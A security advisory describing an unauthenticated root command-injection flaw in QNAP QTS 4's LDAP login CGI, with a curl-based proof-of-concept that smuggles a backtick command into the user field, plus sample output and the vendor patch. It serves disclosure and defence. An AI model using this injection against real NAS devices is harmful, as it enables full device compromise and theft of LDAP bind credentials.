SSD Adivsory – QNAP QTS LDAP Authentication Remote Code Execution

SecuriTeam Secure Disclosure
SecuriTeam Secure Disclosure (SSD) provides the support you need to turn your experience uncovering security vulnerabilities into a highly paid career. SSD was designed by researchers for researchers and will give you the fast response and great support you need to make top dollar for your discoveries.
Introduction
Based on Linux, QNAP QTS 4 is a powerful operating system deployed on all QNAP Turbo NAS devices to bring performance and enhanced functionalities under an easy-to-use web GUI. QTS allows traditional NAS capabilities, in addition to advanced sharing features and mobile platforms support. Moreover, QTS supports custom applications to expand NAS functionalities for sharing and media streaming.
On top of a traditional Linux kernel (3.4.6, x86 64), QTS 4 provides NAS capabilities implemented in user-land and a web-based UI built using cgi-bin technology. Although SSH access is available on all QNAP devices, it is possible to completely manage the device using the web interface.
From the technical standpoint, QTS 4 web UI consists of two main components:
 

  • A web server thttpd and CGI binaries. In the default configuration, this service runs as ”admin”, a user with root permissions. On 80/tcp, the web server hosts a set of scripts to perform a redirect to port 8080/tcp. The service is also available over SSL (443/tcp) using Apache configured as a reverse-proxy, pointing to 8080/tcp. The webroot is located at /home/httpd.
$ ps aux | grep thttpd
5671 admin 3828 S /usr/local/sbin/Qthttpd -p 80 -nor -nos -u admin -d /home/Qhttpd -c **.*
5716 admin 3916 S /usr/local/sbin/_thttpd_ -p 58080 -nor -nos -u admin -d /home/httpd -c **.* -h 127.0.0.1 -i /var/lock/._thttpd_.pid

 

  • A set of custom binaries and standard Linux utilities (e.g. ldapsearch) that are invoked from the CGI scripts, to perform required tasks

By default, the web interface is available from remote hosts with no network filtering.
Vulnerability Overview
A code injection vulnerability has been discovered in the current version of QNAP QTS 4. As mentioned, this vulnerability affects all QNAP NAS products using LDAP authentication. Valid credentials are NOT required in order to exploit this issue, allowing a remote attacker to execute arbitrary system commands as root.

In the following image, it is possible to observe the affected configuration:
Domain Security configuration
QTS 4 allows three authentication configurations:
 

  • No domain security – This is the default configuration using the factory settings. In this mode, there is no domain security configured and a local account repository is used. Common for SOHO, but not feasible for enterprises
  • Active Directory authentication – QTS can leverage Microsoft Active Directory for users authentication. This setting requires an external domain controller, or the QNAP device configured as a controller. This is a common configuration for Windows-centric environments
  • LDAP authentication – QTS can leverage LDAP servers for users authentication. The vulnerability described in this document aff ects this mode. The LDAP server can be either remote, hosted on a remote QNAP device or setup within the local NAS device. Specific LDAP settings do not influence the exploitability of this aw. LDAP authentication is a common configuration for heterogeneous corporate LANs having Mac and Linux workstations

The specific bug affects the authentication CGI script (authLogin.cgi), a ELF 32-bit LSB executable dynamically linked with shared libs, available in the default configuration.
MD5 (authLogin.cgi) = dd316693027196c30125c59b23f897b2
During each login attempt, whenever LDAP authentication is enabled, authLogin.cgi executes the standard ldapsearch command-line utility to retrieve the user’s LDAP entry (uid, password) in order to verify authentication. User-supplied input is directly copied to the UID LDAP attribute used by the command line utility, resulting in code injection.
Proof of Concept
A reliable standalone exploit does simply require curl:

#!/bin/bash
# Retrieve details on the remote target. This unauthenticated endpoint allows to - retrieve the device model and QTS version and build release
curl -k -X 'POST' "https://$1/cgi-bin/sysinfoReq.cgi"
# Exploit the code injection bug
echo "And now sleep for 123 seconds . . . "
curl -s -k -X 'POST' --data-binary $ 'user=admin`sleep%20123`&serviceKey=1&pwd=&r=' "https://$1/cgi-bin/authLogin.cgi"

A successful exploit execution shows:

$ ./qnap.sh 192.168.0.1
<?xml version="1.0" encoding="UTF-8" ?>
<QDocRoot version="1.0">
<model>
<modelName><![CDATA[TS-469U]]></modelName>
<internalModelName><![CDATA[TS-469]]></internalModelName>
<platform><![CDATA[TS-NASX86]]></platform>
<customModelName><![CDATA[]]></customModelName>
<displayModelName><![CDATA[TS-469U]]></displayModelName>
<storage_v2>1</storage_v2>
<encryptfsSupported><![CDATA[1]]></encryptfsSupported>
</model>
<firmware>
<version><![CDATA[4.1.0]]></version>
<build><![CDATA[20140612]]></build>
<buildTime><![CDATA[2014/06/12]]></buildTime>
</firmware>
...
</QDocRoot>
And now sleep for 123 seconds...

On the remote system:

remote$ ps aux | grep sleep
5907 admin 1196 S sh -c /usr/bin/ldapsearch -x -H "ldaps://xxxxxxxxxx" -b "dc=xxxxxx,dc=xxx" -D "uid=xxxxx,dc=xxxxx,dc=xxx" -w "xxxxxxxxxxxxxx" "uid=admin`sleep 123`"
...

As the QTS service is executed with high privileges, a successful attack results in a full compromise. Moreover, an attacker could easily obtain the LDAP account password used to bind the NAS device with the remote LDAP service, potentially resulting in further compromise.
Vulnerable Version
QNAP QTS version 4.1.1
Vendor Response
The vendor has issued several fixes for QNAP, and has included a patch for this vulnerability as well: Security vulnerabilities addressed in QTS 4.1.4 build 0804